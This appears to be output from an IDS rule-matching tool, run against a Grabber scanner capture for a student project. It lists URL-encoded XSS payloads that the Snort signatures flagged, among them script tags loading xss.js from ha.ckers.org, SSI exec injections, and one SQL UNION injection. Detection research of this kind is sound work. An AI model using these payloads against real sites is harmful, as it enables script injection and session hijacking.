# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l grabber.short -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/ficheros_uris_completos/web_estatica//snort/grabber_short.clean
Packet [16]	Uri [/web/?demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [19]	Uri [/web/?demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [20]	Uri [/web/?demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [21]	Uri [/web/?demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [22]	Uri [/web/?demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [23]	Uri [/web/?demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [52]	Uri [/web/?demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [56]	Uri [/web/?demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [88]	Uri [/web/?demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [91]	Uri [/web/?demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [92]	Uri [/web/?demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [93]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [94]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [95]	Uri [/web/?demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [96]	Uri [/web/?demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [97]	Uri [/web/?demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [98]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [99]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [100]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [101]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [102]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [105]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [130]	Uri [/web/?demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [152]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [153]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&]	Nattacks [1]	Signatures	[2009714]
Packet [158]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [159]	Uri [/web/?demo-email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [160]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [161]	Uri [/web/?demo-email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [162]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [163]	Uri [/web/?demo-email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [164]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [165]	Uri [/web/?demo-email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [166]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [167]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [224]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [225]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [232]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [233]	Uri [/web/?demo-email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [296]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [297]	Uri [/web/?demo-email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [302]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [303]	Uri [/web/?demo-email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [304]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [305]	Uri [/web/?demo-email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [306]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [307]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [308]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
